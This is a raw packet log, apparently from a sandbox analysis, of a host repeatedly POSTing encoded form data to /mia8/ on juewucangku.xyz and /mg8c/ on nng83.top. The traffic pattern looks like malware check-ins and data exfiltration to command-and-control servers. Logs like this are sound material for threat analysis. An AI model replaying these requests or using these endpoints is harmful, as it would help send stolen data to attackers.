                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                79192.168.11.20498388.136.96.10680
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Dec 3, 2024 14:56:29.232840061 CET709OUTPOST /mia8/ HTTP/1.1
                                                                                                                                                                                                                                Host: www.juewucangku.xyz
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Origin: http://www.juewucangku.xyz
                                                                                                                                                                                                                                Referer: http://www.juewucangku.xyz/mia8/
                                                                                                                                                                                                                                Content-Length: 223
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                                                                                                                                                                                                                                Data Raw: 70 6c 75 78 56 6d 3d 6f 4c 43 51 74 45 69 6e 75 48 72 5a 57 75 44 2b 69 64 59 77 4f 62 47 74 41 37 37 6e 66 57 79 6d 62 76 30 55 76 38 4c 63 51 71 5a 6f 58 44 50 30 2f 42 71 38 6c 59 71 7a 57 6f 45 6b 7a 36 72 71 34 32 6c 36 65 79 47 72 72 79 39 79 38 2b 30 35 49 47 4e 4b 69 62 2b 66 35 64 45 4b 52 30 72 57 78 33 68 61 56 2b 6d 75 4f 6a 32 65 59 6b 6a 53 74 6b 30 64 33 73 62 66 62 4e 76 6b 74 57 67 4d 2f 4d 36 2b 55 44 68 32 79 64 48 56 57 37 38 33 69 49 31 58 43 66 71 71 70 66 78 64 51 5a 58 54 35 41 59 73 38 68 64 71 31 6b 69 4a 4e 34 7a 34 56 61 4e 63 66 43 4c 4d 45 70 43 63 39 6f 6c 59 46 6c 7a 78 6b 79 49 4c 36 6c 41 76 69 43 6b 79 43 70 51 35 31 30 6b 3d
                                                                                                                                                                                                                                Data Ascii: pluxVm=oLCQtEinuHrZWuD+idYwObGtA77nfWymbv0Uv8LcQqZoXDP0/Bq8lYqzWoEkz6rq42l6eyGrry9y8+05IGNKib+f5dEKR0rWx3haV+muOj2eYkjStk0d3sbfbNvktWgM/M6+UDh2ydHVW783iI1XCfqqpfxdQZXT5AYs8hdq1kiJN4z4VaNcfCLMEpCc9olYFlzxkyIL6lAviCkyCpQ510k=
                                                                                                                                                                                                                                Dec 3, 2024 14:56:29.915668964 CET709OUTPOST /mia8/ HTTP/1.1
                                                                                                                                                                                                                                Host: www.juewucangku.xyz
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Origin: http://www.juewucangku.xyz
                                                                                                                                                                                                                                Referer: http://www.juewucangku.xyz/mia8/
                                                                                                                                                                                                                                Content-Length: 223
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                                                                                                                                                                                                                                Data Raw: 70 6c 75 78 56 6d 3d 6f 4c 43 51 74 45 69 6e 75 48 72 5a 57 75 44 2b 69 64 59 77 4f 62 47 74 41 37 37 6e 66 57 79 6d 62 76 30 55 76 38 4c 63 51 71 5a 6f 58 44 50 30 2f 42 71 38 6c 59 71 7a 57 6f 45 6b 7a 36 72 71 34 32 6c 36 65 79 47 72 72 79 39 79 38 2b 30 35 49 47 4e 4b 69 62 2b 66 35 64 45 4b 52 30 72 57 78 33 68 61 56 2b 6d 75 4f 6a 32 65 59 6b 6a 53 74 6b 30 64 33 73 62 66 62 4e 76 6b 74 57 67 4d 2f 4d 36 2b 55 44 68 32 79 64 48 56 57 37 38 33 69 49 31 58 43 66 71 71 70 66 78 64 51 5a 58 54 35 41 59 73 38 68 64 71 31 6b 69 4a 4e 34 7a 34 56 61 4e 63 66 43 4c 4d 45 70 43 63 39 6f 6c 59 46 6c 7a 78 6b 79 49 4c 36 6c 41 76 69 43 6b 79 43 70 51 35 31 30 6b 3d
                                                                                                                                                                                                                                Data Ascii: pluxVm=oLCQtEinuHrZWuD+idYwObGtA77nfWymbv0Uv8LcQqZoXDP0/Bq8lYqzWoEkz6rq42l6eyGrry9y8+05IGNKib+f5dEKR0rWx3haV+muOj2eYkjStk0d3sbfbNvktWgM/M6+UDh2ydHVW783iI1XCfqqpfxdQZXT5AYs8hdq1kiJN4z4VaNcfCLMEpCc9olYFlzxkyIL6lAviCkyCpQ510k=
                                                                                                                                                                                                                                Dec 3, 2024 14:56:30.246099949 CET403INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                Date: Tue, 03 Dec 2024 13:56:30 GMT
                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                Content-Length: 162
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Location: https://www.juewucangku.xyz/mia8/
                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                80192.168.11.20498398.136.96.10680
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Dec 3, 2024 14:56:32.128263950 CET2578OUTPOST /mia8/ HTTP/1.1
                                                                                                                                                                                                                                Host: www.juewucangku.xyz
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Origin: http://www.juewucangku.xyz
                                                                                                                                                                                                                                Referer: http://www.juewucangku.xyz/mia8/
                                                                                                                                                                                                                                Content-Length: 7371
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                                                                                                                                                                                                                                Data Raw: 70 6c 75 78 56 6d 3d 6f 4c 43 51 74 45 69 6e 75 48 72 5a 57 75 44 2b 69 64 59 77 4f 62 47 74 41 37 37 6e 66 57 79 6d 62 76 30 55 76 38 4c 63 51 71 52 6f 58 79 76 30 2b 6d 47 38 71 34 71 7a 4b 34 45 68 7a 36 72 7a 34 32 74 2b 65 7a 36 52 72 77 46 79 39 66 55 35 42 55 70 4b 33 4c 2b 66 31 39 45 4c 63 55 72 35 78 33 78 57 56 34 47 75 4f 6a 32 65 59 6d 37 53 6b 56 30 64 78 73 62 63 59 4e 75 77 38 47 68 70 2f 4d 6a 4c 55 43 56 4d 79 75 66 56 57 62 73 33 67 2b 70 58 44 2f 71 6f 71 66 77 64 51 5a 4c 4d 35 42 30 61 38 68 6f 39 31 6e 79 4a 63 76 53 33 47 35 39 66 64 7a 36 46 4a 49 4b 6d 38 34 78 55 48 6b 6a 4d 73 30 70 71 30 77 38 76 69 55 30 71 48 73 4d 6f 71 44 75 70 38 71 66 2b 54 76 6d 45 69 46 4b 74 43 6c 31 4b 4a 35 30 2f 41 32 4a 5a 79 5a 6a 6f 4c 77 67 73 46 50 56 49 35 41 6a 35 6f 4c 2b 67 70 47 6a 4a 32 72 6c 35 78 4d 7a 50 51 61 31 6a 33 4e 73 2f 4a 66 32 4c 47 69 45 30 62 2f 6a 32 4f 75 4f 67 57 49 62 64 7a 39 61 63 67 6f 54 44 41 6e 63 61 71 69 59 73 50 6b 6b 54 56 79 55 38 6c 67 4a 71 47 35 2f [TRUNCATED]
                                                                                                                                                                                                                                Data Ascii: pluxVm=oLCQtEinuHrZWuD+idYwObGtA77nfWymbv0Uv8LcQqRoXyv0+mG8q4qzK4Ehz6rz42t+ez6RrwFy9fU5BUpK3L+f19ELcUr5x3xWV4GuOj2eYm7SkV0dxsbcYNuw8Ghp/MjLUCVMyufVWbs3g+pXD/qoqfwdQZLM5B0a8ho91nyJcvS3G59fdz6FJIKm84xUHkjMs0pq0w8viU0qHsMoqDup8qf+TvmEiFKtCl1KJ50/A2JZyZjoLwgsFPVI5Aj5oL+gpGjJ2rl5xMzPQa1j3Ns/Jf2LGiE0b/j2OuOgWIbdz9acgoTDAncaqiYsPkkTVyU8lgJqG5/kukw1bQyUc84UeJo0W8doNYPtKhNfQE7Ma4OuSR4qHHsW+FI6hlKpF++5wGQUgniIKNRWcWJp2J+1S/PG/xxr1WnlVq+xIKqmQH4rEqaXiO6aCsKIn3xEyXOZWqQvAiP+vM5jF9e+n9v2keY4n5q9fMPxoLVaBulqCjC0ZHODvyvzIKUFTXs98QYml1VHfcOlk/pbdPZS0E5EEZvT2C6t85ta2NN6oGYwe2jEOahUWeoapObHbtKBECrNPEpiQKC1bBTBUDiTSgZ7mNHGpbp+EhSrprDqktP3O4Kg1UuAmS+7tihCGvGMZNbI02CCXkCs8RV8R900X85ATZSFQJVbnM1Y2RvfX9TWNjEYzWEmeYb3ujX9BgCUoBpS1UJ3H+veiuWQx8vpYVTxDN7vuGtmjQuIMaJxeYvdTt2Mdj9+ogMqEK427aSfCJM0NcMcENmoFOY9zRciC13lIhcGVdk8vVNEOufLMQjaPq1Fthf27r4fduLH2o2cjBx2kWqYgUJEFcOBhLFIg8wL2pJ9g9RCm7I939SFL86Edh61mwfOP9LBieI1tSfYfn5VGqYuVYEApuhmgvVULEaJx2AurBiGjJL/KKD4PhwZaPuY1CoiPGvCahjQw4qX6OyEchtRUMKdEhgTQIlsMQ/5lWHJd9U37jK8TK2kzs35G [TRUNCATED]
                                                                                                                                                                                                                                Dec 3, 2024 14:56:32.128324032 CET5280OUTData Raw: 59 4b 53 34 4b 46 57 70 67 34 62 33 57 6f 42 63 75 2b 48 6a 43 61 43 6c 57 65 4d 43 79 37 46 30 43 34 36 57 36 53 53 52 6d 4c 56 44 51 74 75 6c 50 71 35 4f 57 48 6e 4b 45 74 57 52 43 54 47 39 51 7a 42 6c 76 49 51 6e 2f 70 6b 6e 6c 68 75 64 37 37
                                                                                                                                                                                                                                Data Ascii: YKS4KFWpg4b3WoBcu+HjCaClWeMCy7F0C46W6SSRmLVDQtulPq5OWHnKEtWRCTG9QzBlvIQn/pknlhud77oocdeHO14HZgRY9OmTTPfWvxz361nYpzBWo43gpND05XwKGRqJO3cMB14+YLz+8SrW/uboGeWvI6EOaVpu3ujmZsOQBjz/aUwubrAWXar3/W0bY8rdoLtXsMWwKaqFvn4I8Mwl9GhvPuPcU6KYC2qPixF3dtzKeeX
                                                                                                                                                                                                                                Dec 3, 2024 14:56:32.490282059 CET403INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                Date: Tue, 03 Dec 2024 13:56:32 GMT
                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                Content-Length: 162
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Location: https://www.juewucangku.xyz/mia8/
                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                81192.168.11.20498408.136.96.10680
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Dec 3, 2024 14:56:34.989713907 CET422OUTGET /mia8/?pluxVm=lJqwuwutw0TxfZ38sJgHJ7uqXbvMJU6pA/kgjN31XYZ5TRzvlECqmYueWqhH+dns4k5MWxqP8Bok6NcIC1536fve9u1GdSOEvFZBDrTYEySAKG7uhWgC+P8=&Z1EO=OvfHeluUy HTTP/1.1
                                                                                                                                                                                                                                Host: www.juewucangku.xyz
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                                                                                                                                                                                                                                Dec 3, 2024 14:56:35.326266050 CET546INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                Date: Tue, 03 Dec 2024 13:56:35 GMT
                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                Content-Length: 162
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Location: https://www.juewucangku.xyz/mia8/?pluxVm=lJqwuwutw0TxfZ38sJgHJ7uqXbvMJU6pA/kgjN31XYZ5TRzvlECqmYueWqhH+dns4k5MWxqP8Bok6NcIC1536fve9u1GdSOEvFZBDrTYEySAKG7uhWgC+P8=&Z1EO=OvfHeluUy
                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                82192.168.11.204984138.47.233.480
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Dec 3, 2024 14:56:40.660944939 CET671OUTPOST /mg8c/ HTTP/1.1
                                                                                                                                                                                                                                Host: www.nng83.top
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Origin: http://www.nng83.top
                                                                                                                                                                                                                                Referer: http://www.nng83.top/mg8c/
                                                                                                                                                                                                                                Content-Length: 203
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                                                                                                                                                                                                                                Data Raw: 70 6c 75 78 56 6d 3d 6d 68 70 72 69 4e 54 68 50 59 39 6b 5a 57 47 6f 4b 78 32 7a 41 67 42 6d 6e 50 43 69 62 49 74 68 6d 55 6e 66 74 56 4e 70 4d 56 39 56 31 59 35 53 34 50 70 41 33 69 32 35 45 74 73 4a 31 4f 72 4f 45 44 38 36 4f 69 69 47 55 56 43 42 39 33 6c 63 48 5a 36 67 52 56 73 7a 45 50 48 75 57 6a 61 6a 67 53 52 6f 4d 45 4d 38 70 6a 58 4f 34 46 65 39 6b 47 54 4d 52 43 4a 6b 4f 6f 57 75 38 59 6b 79 64 50 6a 62 59 36 70 4c 47 70 31 69 66 4f 42 63 4b 72 42 57 52 4a 4b 33 49 67 33 52 58 48 67 57 7a 50 6e 35 49 67 73 46 4c 43 59 4e 4e 73 6e 36 4e 6b 6d 58 6d 2b 6a 70 39 78 77 30 55 6c 73 78 37 51 3d 3d
                                                                                                                                                                                                                                Data Ascii: pluxVm=mhpriNThPY9kZWGoKx2zAgBmnPCibIthmUnftVNpMV9V1Y5S4PpA3i25EtsJ1OrOED86OiiGUVCB93lcHZ6gRVszEPHuWjajgSRoMEM8pjXO4Fe9kGTMRCJkOoWu8YkydPjbY6pLGp1ifOBcKrBWRJK3Ig3RXHgWzPn5IgsFLCYNNsn6NkmXm+jp9xw0Ulsx7Q==
                                                                                                                                                                                                                                Dec 3, 2024 14:56:40.981194019 CET289INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                Date: Tue, 03 Dec 2024 13:56:40 GMT
                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                Content-Length: 146
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                83192.168.11.204984238.47.233.480
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Dec 3, 2024 14:56:43.502299070 CET691OUTPOST /mg8c/ HTTP/1.1
                                                                                                                                                                                                                                Host: www.nng83.top
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Origin: http://www.nng83.top
                                                                                                                                                                                                                                Referer: http://www.nng83.top/mg8c/
                                                                                                                                                                                                                                Content-Length: 223
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                                                                                                                                                                                                                                Data Raw: 70 6c 75 78 56 6d 3d 6d 68 70 72 69 4e 54 68 50 59 39 6b 5a 30 53 6f 4a 51 32 7a 58 77 42 6c 72 76 43 69 52 6f 73 71 6d 55 72 66 74 52 39 48 4d 6e 5a 56 31 35 4a 53 35 4f 70 41 37 43 32 35 4f 4e 73 51 37 75 71 41 45 44 78 50 4f 6e 61 47 55 56 57 42 39 31 74 63 47 75 47 6a 51 46 73 31 4c 76 48 6f 4c 7a 61 6a 67 53 52 6f 4d 45 59 53 70 6a 50 4f 37 31 4f 39 6b 6b 37 4c 4b 69 4a 6e 4a 6f 57 75 33 34 6b 4d 64 50 6a 44 59 37 6b 67 47 73 78 69 66 50 78 63 4a 36 42 5a 49 5a 4c 38 57 51 32 42 55 47 51 62 32 50 54 54 48 79 59 4d 4b 6e 41 72 46 61 71 67 51 57 53 7a 6c 74 2f 62 35 42 4a 63 57 6e 74 71 6d 56 32 69 74 73 67 6a 39 5a 2f 64 51 56 64 31 50 4e 67 30 48 54 55 3d
                                                                                                                                                                                                                                Data Ascii: pluxVm=mhpriNThPY9kZ0SoJQ2zXwBlrvCiRosqmUrftR9HMnZV15JS5OpA7C25ONsQ7uqAEDxPOnaGUVWB91tcGuGjQFs1LvHoLzajgSRoMEYSpjPO71O9kk7LKiJnJoWu34kMdPjDY7kgGsxifPxcJ6BZIZL8WQ2BUGQb2PTTHyYMKnArFaqgQWSzlt/b5BJcWntqmV2itsgj9Z/dQVd1PNg0HTU=
                                                                                                                                                                                                                                Dec 3, 2024 14:56:43.821299076 CET289INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                Date: Tue, 03 Dec 2024 13:56:43 GMT
                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                Content-Length: 146
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                84192.168.11.204984338.47.233.480
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Dec 3, 2024 14:56:46.346246958 CET5156OUTPOST /mg8c/ HTTP/1.1
                                                                                                                                                                                                                                Host: www.nng83.top
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Origin: http://www.nng83.top
                                                                                                                                                                                                                                Referer: http://www.nng83.top/mg8c/
                                                                                                                                                                                                                                Content-Length: 7371
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                                                                                                                                                                                                                                Data Raw: 70 6c 75 78 56 6d 3d 6d 68 70 72 69 4e 54 68 50 59 39 6b 5a 30 53 6f 4a 51 32 7a 58 77 42 6c 72 76 43 69 52 6f 73 71 6d 55 72 66 74 52 39 48 4d 6e 52 56 31 72 42 53 34 74 52 41 34 43 32 35 51 64 73 4e 37 75 71 4e 45 44 70 4c 4f 6e 6e 37 55 52 6d 42 2f 57 31 63 50 36 53 6a 65 46 73 31 41 50 48 70 57 6a 62 70 67 53 68 7a 4d 45 49 53 70 6a 50 4f 37 33 47 39 74 57 54 4c 4e 53 4a 6b 4f 6f 57 36 38 59 6b 33 64 4c 33 54 59 37 68 62 46 66 4a 69 66 76 68 63 4d 4d 64 5a 41 5a 4c 2b 58 51 33 45 55 47 64 62 32 4c 4c 70 48 78 46 58 4b 67 63 72 42 2b 7a 68 4a 48 4b 73 2f 73 6a 48 34 44 46 45 65 30 5a 47 67 43 79 66 72 66 30 64 35 74 2f 59 4d 46 46 43 54 59 6b 6f 5a 30 65 4d 65 56 52 4e 76 2f 51 4c 38 72 4f 6f 72 54 6b 38 34 4d 63 4a 4b 75 4d 56 51 4e 50 77 73 4e 59 6c 66 63 38 77 43 52 34 61 65 68 4b 7a 6e 57 74 44 50 6f 59 36 68 6f 72 53 2b 58 79 54 4c 6d 67 4c 4f 6b 47 58 48 73 69 66 55 31 2b 6a 44 34 4d 44 59 58 72 4e 48 44 6a 7a 39 77 4e 61 46 42 44 48 74 72 6c 52 45 31 5a 35 47 36 48 7a 47 35 6d 78 7a 6c 7a [TRUNCATED]
                                                                                                                                                                                                                                Data Ascii: pluxVm=mhpriNThPY9kZ0SoJQ2zXwBlrvCiRosqmUrftR9HMnRV1rBS4tRA4C25QdsN7uqNEDpLOnn7URmB/W1cP6SjeFs1APHpWjbpgShzMEISpjPO73G9tWTLNSJkOoW68Yk3dL3TY7hbFfJifvhcMMdZAZL+XQ3EUGdb2LLpHxFXKgcrB+zhJHKs/sjH4DFEe0ZGgCyfrf0d5t/YMFFCTYkoZ0eMeVRNv/QL8rOorTk84McJKuMVQNPwsNYlfc8wCR4aehKznWtDPoY6horS+XyTLmgLOkGXHsifU1+jD4MDYXrNHDjz9wNaFBDHtrlRE1Z5G6HzG5mxzlz7nunF+jA+61eLZMcPyZGZypbztKo+d+AhJj6ln9DDQega0jD6+Lk1dpeQsvtpprEEvRnp7PXNenFNnUYCrY1ULfMvL6seXA2DMGK7IZi78fEy311DS8qGScoitVN6bod3dsdKTf7r7Pk9lknnVLqiaGWiVzzsfHmYDCbKgxgECtDwDod6owp0gnWhfYmGWbkIqIm3spGFbXzm3IgCj/xNpmjfdGqGB+7McZJm86pvBDhk9sKmOS/gyodXQP7YFBSCHaJDlzQkQpzQ8xkk9NsberUE7tcx/OaMUNSTlhudZWsdwwbZP6GVoznRzwnHWqfXqHoPS2gb8IAlyyiPAdi0YbRe+U0IgogvKbrGx7RzzGgL1bD3TyhsILU5UcvSVtgyUoPTp6VilWKCeCf4FlywcqF4YdXEmRoFri7NULORwerSreW9ezLFNr8yhj0mRLPqrpZrvAEunveLCTRdSQRWF4kQnlGlr6QNVJYbmowW2kIngCn10wN/hAsgliUFk1rq2h5bWStQFBJOLqFMFhrDVG1cvRoFviNPT9Eiakl7fxSSDp2IL30I3oXkWrffHvefANCv5B7EoUh4OxkdigyUwJVCCjiBsD+qLU6MvSTwl/o+BLD8Zn5tgnjG3vpkBRLaymTdY/vtit5puy0tKdTqgLqTjYkPKvpMP [TRUNCATED]
                                                                                                                                                                                                                                Dec 3, 2024 14:56:46.346308947 CET2684OUTData Raw: 77 73 43 36 2f 58 42 71 57 42 75 2b 59 51 4a 2f 31 4d 4d 57 6e 31 5a 66 75 42 31 4b 45 53 53 50 44 58 45 56 50 47 36 66 32 42 35 64 58 77 39 72 58 6c 38 6e 71 53 43 4f 69 36 61 31 56 51 61 47 6b 58 6a 39 70 52 68 61 50 59 61 47 56 56 6d 6c 44 71
                                                                                                                                                                                                                                Data Ascii: wsC6/XBqWBu+YQJ/1MMWn1ZfuB1KESSPDXEVPG6f2B5dXw9rXl8nqSCOi6a1VQaGkXj9pRhaPYaGVVmlDqre1xaXE5utx3iGMDZV//KhX9mzWra+hA1MdmpvLbX2LEdM7kjgHTgFI5wk1Yh95Gl2p46Ip61TEzFJACrvRZ+MntCTfa98pDA4WQ/4RiWGOq1J/XVLdaR6gw7isfc8agHSkfWhqAd+7Yhc5gvHLrZCrSZFXJ3vEF6
                                                                                                                                                                                                                                Dec 3, 2024 14:56:46.666198969 CET289INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                Server: nginx
